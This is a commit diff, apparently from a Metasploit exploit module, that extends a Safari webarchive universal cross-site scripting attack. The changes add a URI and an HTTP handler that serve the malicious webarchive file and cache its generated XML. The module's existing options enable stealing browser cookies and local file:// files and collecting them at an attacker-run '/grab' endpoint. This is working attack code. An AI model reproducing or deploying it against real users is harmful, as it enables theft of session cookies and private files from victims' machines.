@@ -50,6 +50,7 @@ def initialize(info = {})
50
50
OptString . new ( 'FILENAME' , [ true , 'The file name.' , 'msf.webarchive' ] ) ,
51
51
OptString . new ( 'URLS' , [ true , 'A space-delimited list of URLs to UXSS (eg http//browserscan.rapid7.com/' ] ) ,
52
52
OptString . new ( 'URIPATH' , [ false , 'The URI to receive the UXSS\'ed data' , '/grab' ] ) ,
53
+ OptString . new ( 'DOWNLOAD_URI' , [ true , 'The path to download the webarhive.' , '/msf.webarchive' ] ) ,
53
54
OptString . new ( 'FILE_URLS' , [ false , 'Additional file:// URLs to steal.' , '' ] ) ,
54
55
OptBool . new ( 'STEAL_COOKIES' , [ true , "Enable cookie stealing." , true ] ) ,
55
56
OptBool . new ( 'STEAL_FILES' , [ true , "Enable local file stealing." , true ] ) ,
@@ -153,6 +154,20 @@ def start_http(opts={})
153
154
@service_path = uopts [ 'Path' ]
154
155
@http_service . add_resource ( uopts [ 'Path' ] , uopts )
155
156
157
+ # Add path to download
158
+ uopts = {
159
+ 'Proc' => Proc . new { |cli , req |
160
+ resp = Rex ::Proto ::Http ::Response ::OK . new
161
+ resp [ 'Content-Type' ] = 'application/x-webarchive'
162
+ resp . body = @xml . to_s
163
+ cli . send_response resp
164
+ } ,
165
+ 'Path' => webarchive_download_url
166
+ } . update ( opts [ 'Uri' ] || { } )
167
+ @http_service . add_resource ( webarchive_download_url , uopts )
168
+
169
+ print_status ( "Using URL: #{ proto } ://#{ opts [ 'ServerHost' ] } :#{ opts [ 'ServerPort' ] } #{ webarchive_download_url } " )
170
+
156
171
# As long as we have the http_service object, we will keep the ftp server alive
157
172
while @http_service
158
173
select ( nil , nil , nil , 1 )
@@ -176,9 +191,10 @@ def on_request_uri(cli, request)
176
191
177
192
# @return [String] contents of webarchive as an XML document
178
193
def webarchive_xml
179
- xml = webarchive_header
180
- urls . each_with_index { |url , idx | xml << webarchive_iframe ( url , idx ) }
181
- xml << webarchive_footer
194
+ return @xml if not @xml . nil? # only compute xml once
195
+ @xml = webarchive_header
196
+ urls . each_with_index { |url , idx | @xml << webarchive_iframe ( url , idx ) }
197
+ @xml << webarchive_footer
182
198
end
183
199
184
200
# @return [String] the first chunk of the webarchive file, containing the WebMainResource
@@ -288,8 +304,9 @@ def webarchive_footer
288
304
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
289
305
# [a encodeObject:response forKey:@"WebResourceResponse"];
290
306
def web_response_xml ( script )
291
- # this is a binary plist, but im too lazy to write a real encoder.
292
- # ripped this straight out of a safari webarchive save.
307
+ # this is a serialized NSHTTPResponse, i'm too lazy to write a
308
+ # real encoder so yay lets use string interpolation.
309
+ # ripped this straight out of a webarchive save
293
310
script [ 'content-length' ] = script [ :body ] . length
294
311
whitelist = %w( content-type content-length date etag
295
312
Last-Modified cache-control expires )
@@ -711,7 +728,7 @@ def all_script_urls(pages)
711
728
end
712
729
end
713
730
714
- # @return [Array<Array<String >>] list of URLs for remote javascripts that are cacheable
731
+ # @return [Array<Array<Hash >>] list of headers returned by cacheabke remote javascripts
715
732
def find_cached_scripts
716
733
cached_scripts = all_script_urls ( urls ) . each_with_index . map do |urls_for_site , i |
717
734
begin
@@ -780,6 +797,11 @@ def backend_url
780
797
"#{ proto } ://#{ myhost } #{ port_str } "
781
798
end
782
799
800
+ # @return [String] URL that serves the malicious webarchive
801
+ def webarchive_download_url
802
+ @webarchive_download_url ||= datastore [ "DOWNLOAD_URI" ]
803
+ end
804
+
783
805
# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
784
806
# via the FILE_URLS module option.
785
807
def interesting_file_urls
0 commit comments